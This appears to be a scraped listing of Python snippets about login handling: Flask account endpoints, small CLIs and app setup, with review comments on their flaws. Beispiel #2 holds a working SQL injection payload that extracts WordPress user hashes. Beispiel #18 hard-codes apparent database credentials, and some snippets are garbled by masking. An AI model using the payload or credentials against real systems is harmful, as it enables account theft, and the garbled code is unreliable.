Beispiel #1
def deletedUser_POST():
	"""Handle POST /deletedUser for the account named by the JSON field ``login``.

	The response status is whatever ``Login.userSuppr(login)`` returns when
	``Login.isLogin(login)`` is True, 1002 when it is not, and 1004 (with a
	plain-text error body) when anything inside the handler raises.
	"""
	# NOTE(review): the handler acts on the login supplied in the body and only
	# checks that this login exists. No session, token or password is verified
	# here, so unless the route is protected elsewhere any caller can target
	# any account.
	logger.info('\n/deletedUser		method : POST')
	logger.info(request.data)
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		payload = json.loads(request.data)
		login = str(payload["login"])
		known = Login.isLogin(login) == True
		# 1002 is the code for a login that does not exist.
		resp.status_code = Login.userSuppr(login) if known else 1002
	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
	return resp
Beispiel #2
def attack(url):
    # Demonstration client for a SQL injection in a WordPress AJAX action.
    # It builds the URL of admin-ajax.php?action=get_old_table and a form body
    # whose tableId field carries a UNION SELECT over user_login and user_pass
    # in wp_users. The Host header is fixed to 'localhost'.
    #
    # NOTE(review): the request call itself is not visible. From the first
    # input() onward the snippet was damaged where the hosting page replaced
    # credential-like text with "******"; those lines are not valid Python as
    # shown and the rest of the function is missing.
    #
    # Defender notes: the payload only works if the server places tableId into
    # a query without binding it. The fix on the plugin side is an integer
    # cast or a prepared statement ($wpdb->prepare) plus a capability/nonce
    # check on the action. In web logs, a tableId value that is not a plain
    # integer in a request to this action is a reliable signal.

    path = url + "/wp-admin/admin-ajax.php?action=get_old_table"
    headers = {
        'content-type': 'application/x-www-form-urlencoded',
        'host': 'localhost'
    }
    data = {
        "tableId":
        "1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID>=0"
    }

    print("SQL Injection attack.")
    username = input("Insert your username: "******"Insert your password: "******"Your login failed. Username or password wrong. Insert them again!"
        )
        username = input("Insert your username: "******"Insert your password: "******":")
Beispiel #3
def ModifyDescription_POST():
	"""Handle POST /ModifyDescription: update description, then mail, of a login.

	Reads ``login``, ``description`` and ``mail`` from the JSON body. The
	description is changed first; the mail is changed only if that call
	returned 200. The last returned code becomes the response status. Any
	exception yields status 1004 with a plain-text error body.
	"""
	# NOTE(review): the account to modify is chosen by the ``login`` field
	# alone; no credential or session is checked in this handler, so the mail
	# address of any account can be changed by any caller unless the route is
	# guarded elsewhere.
	logger.info('\n/ModifyDescription		method : POST')
	logger.info(request.data)
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		resp.status_code = 200
		payload = json.loads(request.data)
		login = str(payload["login"])
		desc = str(payload["description"])
		mail = str(payload["mail"])
		outcome = Login.descModif(login, desc)
		if outcome == 200:
			outcome = Login.mailModif(login, mail)
		resp.status_code = outcome
	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
		return resp
	logger.info(resp.data)
	return resp
Beispiel #4
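def erasePassword_POST():
	"""Handle POST /erasePassword: set a new password for an existing login.

	Expects a JSON body with ``login`` and ``password``. The response status is
	the value returned by ``Login.changePass`` when ``Login.isLogin`` accepts
	the login, 1002 when it does not, and 1004 (plain-text error body) when
	the handler raises.
	"""
	# NOTE(review): the only precondition is that the login exists. No old
	# password, reset token or session is checked here, so unless the route is
	# protected elsewhere any caller can overwrite any account's password.
	logger.info('\n/erasePassword		method : POST')
	# The raw request body is deliberately not logged: it carries the new
	# password in clear text and would persist in the log files.
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		resp.status_code = 200
		req_data = json.loads(request.data)
		login = str(req_data["login"])
		password = str(req_data["password"])
		if (Login.isLogin(login) == True):
			resp.status_code = Login.changePass(login, password)
		else:
			# Unknown login.
			resp.status_code = 1002
	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
		return resp
	return resp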
Beispiel #5
def forgotPassword_POST():
	"""Handle POST /forgotPassword for the ``login`` and ``mail`` in the JSON body.

	The response status is the value returned by
	``Login.forgetPassword(login, mail)`` when ``Login.isLogin(login)`` is
	True, 1002 when it is not, and 1004 (plain-text error body) when the
	handler raises.
	"""
	# NOTE(review): answering 1002 for unknown logins lets a caller find out
	# which logins exist. Whether the supplied mail must match the stored one
	# is decided inside Login.forgetPassword, which is not visible here.
	logger.info('/forgotPassword		method : POST')
	logger.info(request.data)
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		# Default status when nothing below overrides it.
		resp.status_code = 200
		payload = json.loads(request.data)
		logger.info(payload)
		login = str(payload["login"])
		mail = str(payload["mail"])
		known = Login.isLogin(login) == True
		resp.status_code = Login.forgetPassword(login, mail) if known else 1002
	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
	return resp
Beispiel #6
def capteur_POST():
	"""Handle POST /capteur: return the readings of one sensor for one user.

	JSON body fields: ``login``, ``capteurId``, ``mesure``, ``dateDebut`` and
	``dateFin``. On success the body is ``{"releve": [...]}`` with status 200.
	Status 1002 means the login is unknown, 1006 the sensor is unknown, 1007
	the login has no access to the sensor, and 1004 (plain-text error body)
	that the handler raised.
	"""
	# NOTE(review): the access check trusts the ``login`` field of the body;
	# nothing here proves the caller is that user, so Login.userAccess only
	# helps if the route is authenticated elsewhere.
	logger.info('/capteur		method : POST')
	logger.info(request.data)
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		payload = json.loads(request.data)
		logger.info(payload)
		login = str(payload["login"])
		capteurId = str(payload["capteurId"])
		mesure = str(payload["mesure"])
		# NOTE(review): the two dates go to Probe exactly as received, without
		# type or format checks; confirm Probe binds them as query parameters.
		dateDebut = payload["dateDebut"]
		dateFin = payload["dateFin"]

		# The checks run in this order and stop at the first failure.
		denied = None
		if not (Login.isLogin(login) == True):
			denied = 1002
		elif not (Probe.isBalise(capteurId) == True):
			denied = 1006
		elif not (Login.userAccess(login, capteurId) == True):
			denied = 1007
		if denied is not None:
			resp.status_code = denied
			return resp

		# Any unlisted measure name falls back to the generic reader.
		reader_names = {
			"temperature": "temperatureValue",
			"ozone": "ozoneValue",
			"hygrometrie": "hygrometrieValue",
			"humidite": "humiditeValue",
		}
		reader = getattr(Probe, reader_names.get(mesure, "capteurValue"))
		releve = reader(login, capteurId, dateDebut, dateFin)

		resp.data = json.dumps({"releve": releve})
		resp.status_code = 200
		logger.info(resp.data)
	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
	return resp
Beispiel #7
def performLogin(url):
    # Prompts for a username and a password and, judging by the visible retry
    # branch, asks again after a failed LoginManager.login(url, username,
    # password).
    # NOTE(review): this snippet was damaged where the hosting page replaced
    # credential-like text with "******"; it is not valid Python as shown and
    # the loop condition is not visible.
    # NOTE(review): the password appears to be read with input(), which echoes
    # it to the terminal; getpass.getpass() reads it without echo.
    username = input("\nInsert your username: "******"Insert your password: "******"\nYour login failed, Username or password are wrong, insert them again"
        )
        username = input("Insert your username: "******"Insert your password: ")
        result = LoginManager.login(url, username, password)
Beispiel #8
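def main():
    """Parse the command line and run one user or class action against MySQL.

    Options, each taking a value: -u/--user, -p/--password, -c/--cellphone,
    -e/--email and -a/--action. Handled actions are "createuser", "loginuser"
    and "addclass"; any other action only opens and closes the connection.
    """
    # NOTE(review): a password passed with -p/--password is visible to other
    # local users in the process list and ends up in shell history; prompting
    # with getpass would avoid both.
    # Each short option needs a trailing ":" to accept a value; without it the
    # value was parsed as a positional argument and the option arrived empty.
    # NOTE(review): the 'user=' and 'password=' entries were masked on the page
    # this listing comes from and are reconstructed from the handling below.
    options, remainder = getopt.gnu_getopt(
        sys.argv[1:], 'u:p:c:e:a:',
        ['user=', 'password=', 'cellphone=', 'email=', 'action='])

    user = "******"
    password = "******"
    cellphone = "empty_phone"
    action = "empty_action"
    email = "empty_email"
    # No option sets the next four; "addclass" runs with these placeholders.
    classstring = "empty_class"
    sectionfrom = "empty_section"
    sectionto = "empty_section"
    userid = "empty_userid"

    for opt, arg in options:
        if opt in ('-u', '--user'):
            user = arg
        elif opt in ('-p', '--password'):
            password = arg
        elif opt in ('-c', '--cellphone'):
            cellphone = arg
        elif opt in ('-e', '--email'):
            email = arg
        # The missing comma made this a substring test against '-a--action'.
        elif opt in ('-a', '--action'):
            action = arg
        else:
            print("wrong args")

    cnx = mysql_connect()
    try:
        if action == "createuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.create_user(user, password, email, cellphone))
        elif action == "loginuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.login_user(user, password))
        elif action == "addclass":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            print(
                discussion_manager.add_class(userid, classstring, sectionfrom,
                                             sectionto))
    finally:
        # Release the connection even when an action raises.
        cnx.close()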
Beispiel #9
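def login_POST():
	"""Handle POST /login: check ``login`` and ``password`` from the JSON body.

	Status 200 with the result of ``Login.userInfo(login)`` as JSON body when
	both checks pass, 1003 when the password is rejected, 1002 when the login
	is unknown; in the two failure cases the body is the placeholder record
	defined below. Status 1004 (plain-text error body) when the handler raises.
	"""
	# NOTE(review): the distinct codes 1002 and 1003 tell a caller whether a
	# login exists, and no attempt limiting is visible in this handler.
	logger.info('\n/login		method : POST')
	# The raw request body is deliberately not logged: it contains the
	# password in clear text and would persist in the log files.
	resp = make_response()
	addCorsHeaders(resp)
	# Placeholder record returned when authentication fails.
	tmp={"nom":"toto","prenom":"toto","description":"toto","login":"******"}
	try:
		resp.headers['Content-Type'] = 'application/json'
		req_data = json.loads(request.data)
		login = str(req_data["login"])
		password = str(req_data["password"])
		if (Login.isLogin(login) == True):
			if (Login.isPass(login, password) == True):
				resp.status_code = 200
				tmp = Login.userInfo(login)
			else:
				# Wrong password.
				resp.status_code = 1003
		else:
			# Unknown login.
			resp.status_code = 1002
		resp.data = json.dumps(tmp)
		logger.info(resp.data)
	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
		return resp

	return resp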
Beispiel #10
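def user_POST():
	"""Handle POST /user: create an account from the JSON body.

	Required fields: ``login``, ``password``, ``nom``, ``prenom``, ``mail`` and
	``description``. The response status is the value returned by
	``Login.insertUser`` when the login is free, 1005 when it already exists,
	and 1004 (plain-text error body) when the handler raises.
	"""
	logger.info('/user		method : POST')
	# Neither the raw body nor the parsed body is logged: both contain the new
	# account's password in clear text.
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		req_data = json.loads(request.data)
		login = str(req_data["login"])
		password = str(req_data["password"])
		nom = str(req_data["nom"])
		prenom = str(req_data["prenom"])
		mail = str(req_data["mail"])
		desc = str(req_data["description"])
		if (Login.isLogin(login) == False):
			# NOTE(review): the password is handed over as received; confirm
			# that Login.insertUser stores a salted hash rather than the
			# clear text.
			resp.status_code = Login.insertUser(login, password, nom, prenom, desc,mail)
		else:
			# Login already taken.
			resp.status_code = 1005

	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
		return resp
	return resp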
Beispiel #11
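def modifyPassword_POST():
	"""Handle POST /modifyPassword: change a password after checking the old one.

	JSON body fields: ``login``, ``ancienPassword`` and ``newPassword``. The
	response status is the value returned by ``Login.changePass`` when the
	login exists and the old password is accepted, 1003 when the old password
	is rejected, 1002 when the login is unknown, and 1004 (plain-text error
	body) when the handler raises.
	"""
	logger.info('/modifyPassword		method : POST')
	# Neither the raw body nor the parsed body is logged: both contain the old
	# and the new password in clear text.
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		resp.status_code = 200
		req_data = json.loads(request.data)
		login = str(req_data["login"])
		aPassword = str(req_data["ancienPassword"])
		nPassword = str(req_data["newPassword"])
		if (Login.isLogin(login) == True):
			if (Login.isPass(login, aPassword) == True):
				# Report the outcome of the change itself. The result used
				# to be discarded, so a failed update still answered 200.
				resp.status_code = Login.changePass(login, nPassword)
			else:
				# Old password rejected.
				resp.status_code = 1003
		else:
			# Unknown login.
			resp.status_code = 1002

	except Exception as e:
		# Every failure, not only malformed JSON, is reported as 1004.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
		return resp
	return resp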
Beispiel #12
def userlist_GET():
	"""Handle GET /userList: return ``Login.userList()`` serialised as JSON.

	Status 200 on success; status 1004 with a plain-text error body when the
	lookup or the serialisation raises.
	"""
	# NOTE(review): no caller check is made in this handler, so the complete
	# user list is served to anyone who can reach the route unless access is
	# restricted elsewhere.
	logger.info('\n/userList		method : GET')
	resp = make_response()
	addCorsHeaders(resp)
	try:
		resp.headers['Content-Type'] = 'application/json'
		resp.status_code = 200
		resp.data = json.dumps(Login.userList())
	except Exception as e:
		# Every failure is reported as 1004, whatever its cause.
		print (e)
		resp.status_code = 1004
		resp.data = "error 1004 : Bad format json"
	else:
		logger.info(resp.data)
	return resp
Beispiel #13
from flask_sqlalchemy import SQLAlchemy
from flask

-login
import LoginManager

################
#### config ####
################

# Application object. With instance_relative_config=True the file name given
# to from_pyfile() is resolved against the instance folder.
app = Flask(__name__, instance_relative_config=True)
# NOTE(review): flask.cfg presumably holds SECRET_KEY and the database URI;
# keep it out of version control and readable only by the service account.
app.config.from_pyfile('flask.cfg')

db = SQLAlchemy(app)

# Flask-Login setup: anonymous requests to protected views are redirected to
# the "users.login" endpoint.
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "users.login"

from project.models import User


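@login_manager.user_loader
def load_user(user_id):
    """Return the User whose id equals *user_id*, or None.

    Flask-Login calls this with the id stored in the session. A value that is
    not an integer is treated as "no such user" instead of raising, because a
    user loader is expected to return None for an invalid id and the stored
    value comes from a client-held cookie.
    """
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return None
    return User.query.filter(User.id == numeric_id).first()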


####################
#### blueprints ####
####################
Beispiel #14
import os
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask-sqlalchemy import SQLAlchemy
from flask-login import LoginManager
from flask-migrate import Migrate 
from flask-bootstrap import Bootstrap

from config import Config


# NOTE(review): the import lines above name the extensions with hyphens
# (flask-sqlalchemy, flask-login, flask-migrate, flask-bootstrap). Those are
# the distribution names; the importable modules use underscores, so the file
# does not parse as shown.
app = Flask(__name__)
# Settings come from the Config class imported from the local config module.
app.config.from_object(Config)
db = SQLAlchemy(app)
login = LoginManager(app)
migrate = Migrate(app, db)
# Endpoint Flask-Login redirects to when a protected view is requested
# anonymously.
login.login_view = 'login'


# Outside debug mode, make sure a local 'logs' directory exists.
# NOTE(review): the exists()/mkdir() pair can race when two workers start
# together; os.makedirs('logs', exist_ok=True) does the same in one step. The
# rest of this block is not visible in the excerpt.
if not app.debug:
    if not os.path.exists('logs'):
        os.mkdir('logs')


Beispiel #15
from LoginManager import *
'''
..
----------------------------------------------------------------------
Ran 2 tests in 0.001s

OK



'''

# global managers to point to
# Three independent PasswordManager/LoginManager pairs shared by the tests
# below. Each LoginManager is built around its own PasswordManager.
# NOTE(review): the fixtures are created once at import time, so state changed
# by one test is seen by the next; building them in setUp() would isolate the
# tests.
passwordManagerOne = PasswordManager()
loginManagerOne = LoginManager(passwordManagerOne)

passwordManagerTwo = PasswordManager()
loginManagerTwo = LoginManager(passwordManagerTwo)

passwordManagerThree = PasswordManager()
loginManagerThree = LoginManager(passwordManagerThree)


class LoginManagerTest(unittest.TestCase):
    """Tests that run against the module-level manager fixtures."""
    global loginManagerOne, loginManagerTwo, loginManagerThree, passwordManagerOne, passwordManagerTwo, passwordManagerThree

    def test_gettingPasswords(self):
        # A fresh PasswordManager must hand back "password" for both the
        # database and the FTP credential.
        # NOTE(review): the expected value implies PasswordManager ships with
        # a fixed default password; confirm that default never reaches a
        # deployed configuration.
        for accessor in ("getDatabasePassword", "getFtpPassword"):
            self.assertEqual(getattr(passwordManagerOne, accessor)(), "password")
Beispiel #16
# Handshake result: anything other than the exact bytes b"Accept" ends the
# client.
# NOTE(review): one recv() on a stream socket may return only part of what
# the peer sent, so a split "Accept" would be read as a refusal. The client
# also exits with status 0 when the server refuses.
resp = s.recv(1024)
if resp != b"Accept":
    s.close()
    sys.exit(0)

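def sendToServer(plaintext):
    """Send *plaintext* to the server as ciphertext followed by its signature.

    The message is signed with the local private key, encrypted under
    ``serverSessionKey`` and written to socket ``s``. The signature follows as
    a second write after a one-second pause.
    """
    signature = keys.signUsingPrivateKey(plaintext)
    encryptedText = keys.encrypt(plaintext, serverSessionKey)
    # sendall() keeps writing until every byte has been handed to the kernel;
    # send() may stop early and silently truncate the message.
    s.sendall(encryptedText)
    # NOTE(review): the pause is the only thing separating the two messages on
    # the stream; a length prefix would give the server reliable framing.
    time.sleep(1)
    # NOTE(review): the signature covers the plaintext and travels outside the
    # encryption, so an observer holding the public key can test guesses of
    # the message against it. Signing the ciphertext or encrypting the
    # signature avoids that.
    s.sendall(signature)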


# Creates log-in manager
login = lm.LoginManager()
currentUser = None

# Loop infinitely until user is logged into the system
while True:
    cmd = input("What would you like to do? [R] for register, [L] for login, [Q] for quit. \n")

    # Quitting program
    if cmd.upper() == "Q":
        print("Exiting, goodbye!")
        s.send(b"Close")
        s.close()
        sys.exit(0)

    # Sending registration request with digital signature
    elif cmd.upper() == "R":
Beispiel #17
from flask import Flask, render_template, request, redirect, url_for, make_response
from flask_pymongo import PyMongo
from flask_wtf import FlaskForm 
from wtforms import StringField, validators
from flask-login import LoginManager()

# Extension objects are created unbound and attached to the app below.
mongo = PyMongo()
login_manager = LoginManager()
app = Flask(__name__)
# NOTE(review): the connection string carries the database user name and, in
# the original file, apparently its password (the page's e-mail obfuscation
# replaced that part with "[email protected]"). Credentials kept in source
# should be treated as exposed: rotate them and read the URI from the
# environment or a secret store.
app.config['MONGO_URI'] = 'mongodb+srv://eoghan:[email protected]/test?retryWrites=true&w=majority'
# NOTE(review): SECRET_KEY signs the session cookie and the Flask-WTF CSRF
# tokens. A short fixed value in source lets anyone who reads or guesses it
# forge both; generate a long random key and load it from outside the code.
app.config['SECRET_KEY'] = "somekey"
login_manager.init_app(app)
mongo.init_app(app)

# Handles on the MongoDB client, the beta_db database and its comments
# collection.
client = mongo.cx
db = client.beta_db
comments = db.comments

comment = 'Submit YES to get started.'

class LoginForm(FlaskForm):
	"""Login form with a single required text field, ``name``, labelled 'username'."""
	# NOTE(review): the form has no password field, so it cannot by itself
	# carry anything a login view could verify.
	name = StringField(
		'username',
		validators=[validators.DataRequired()],
	)

@app.route('/login', methods = ['GET', 'POST'])
def login():
	# Login view: on a valid form submission it flashes a success message and
	# redirects to the 'index' endpoint.
	# NOTE(review): login_user() is commented out and no credential is
	# checked, so every submission with a non-empty username is reported as a
	# successful login while no user session is established.
	# NOTE(review): flask.flash and flask.url_for rely on the name `flask`,
	# which the visible imports do not bind (only names from flask are
	# imported, and flash is not among them); this raises NameError unless the
	# module is imported elsewhere.
	# NOTE(review): the excerpt ends inside the function; the branch for GET
	# requests and invalid submissions is not visible.
	form = LoginForm()
	if form.validate_on_submit():
#		login_user(user)
		flask.flash('Loggin in successfully.')		

		return redirect(flask.url_for('index'))
Beispiel #18
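def main():
    """Parse the command line and run one user, class or team action on MySQL.

    Options with a short form, each taking a value: -u/--user, -p/--password,
    -c/--cellphone, -e/--email and -a/--action. Long-only options: --userid,
    --classstring, --sectionfrom, --sectionto, --leader, --teamname,
    --section, --remain and --desc. Handled actions: "createuser",
    "loginuser", "addclass", "removeclass", "getjson", "raiseTeam" and
    "joinTeam".
    """
    # NOTE(review): a password passed with -p/--password is visible to other
    # local users in the process list and ends up in shell history; prompting
    # with getpass would avoid both.
    # Each short option needs a trailing ":" to accept a value; without it the
    # value was parsed as a positional argument and the option arrived empty.
    # NOTE(review): the 'user=' and 'password=' entries were masked on the page
    # this listing comes from and are reconstructed from the handling below.
    options, remainder = getopt.gnu_getopt(
        sys.argv[1:], 'u:p:c:e:a:',
        ['user=', 'password=', 'cellphone=', 'email=',
         'classstring=', 'sectionfrom=', 'sectionto=', 'userid=',
         'action=',
         # The closing quote of this entry did not match its opening quote.
         'leader=',
         'teamname=', 'section=', 'remain=', 'desc='])

    user = "******"
    password = "******"
    cellphone = "empty_phone"
    action = "empty_action"
    email = "empty_email"
    classstring = "empty_class"
    sectionfrom = "empty_section"
    sectionto = "empty_section"
    userid = "empty_userid"
    leader = "empty_leader"
    teamname = "empty_teamname"
    section = "empty_section"
    remain = "empty_remain"
    desc = "empty_remain"

    # The long-only options used to be tested with `opt in ('--name')`, which
    # is a substring test against a string, not a tuple lookup. gnu_getopt
    # reports the full option name, so equality is the right comparison.
    for opt, arg in options:
        if opt in ('-u', '--user'):
            user = arg
        elif opt in ('-p', '--password'):
            password = arg
        elif opt in ('-c', '--cellphone'):
            cellphone = arg
        elif opt in ('-e', '--email'):
            email = arg
        elif opt == '--userid':
            userid = arg
        elif opt == '--classstring':
            classstring = arg
        elif opt == '--sectionfrom':
            sectionfrom = arg
        elif opt == '--sectionto':
            sectionto = arg
        # -a is declared as a short option above, so it is accepted here too.
        elif opt in ('-a', '--action'):
            action = arg
        elif opt == '--leader':
            leader = arg
        elif opt == '--teamname':
            teamname = arg
        # Was spelled '--sction', so --section always fell to "wrong args".
        elif opt == '--section':
            section = arg
        elif opt == '--remain':
            remain = arg
        elif opt == '--desc':
            desc = arg
        else:
            print("wrong args")

    # TODO: accept GroupManager arguments from the command line, create
    # GroupManager instances and call their methods.

    # NOTE(review): database user, password and host are hard-coded here and
    # have been published with this listing. Treat them as compromised:
    # rotate the password, then load all four values from the environment or
    # a secret store instead of the source file.
    sqlconnector = MysqlConnector.mysqlconnector("hongkan", "aa6418463",
                                                 "realone.c0hpz27iuq3x.us-west-1.rds.amazonaws.com",
                                                 "GJ_TEST_DB")
    cnx = sqlconnector.mysql_connect()

    try:
        if action == "createuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.create_user(user, password, email, cellphone))
        elif action == "loginuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.login_user(user, password))
        elif action == "addclass":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            print(discussion_manager.add_class(userid, classstring, sectionfrom, sectionto))
        elif action == "removeclass":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            print(discussion_manager.remove_class(userid, classstring))
        elif action == "getjson":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            discussion_manager.getJSON(userid)
        elif action == "raiseTeam":
            # NOTE(review): "TeanManager" looks like a misspelling of
            # TeamManager; confirm against the module's import lines.
            team_manager = TeanManager.teamManager(cnx)
            print(team_manager.raise_team(leader, teamname, classstring, section, remain, desc))
        elif action == "joinTeam":
            team_manager = TeanManager.teamManager(cnx)
            # NOTE(review): neither join_teams nor username is defined in this
            # function; presumably team_manager.join_teams(user, ...) was
            # meant. Confirm against the team manager's API.
            print(join_teams(username, teamname, classstring, section))
    finally:
        # Release the connection even when an action raises.
        cnx.close()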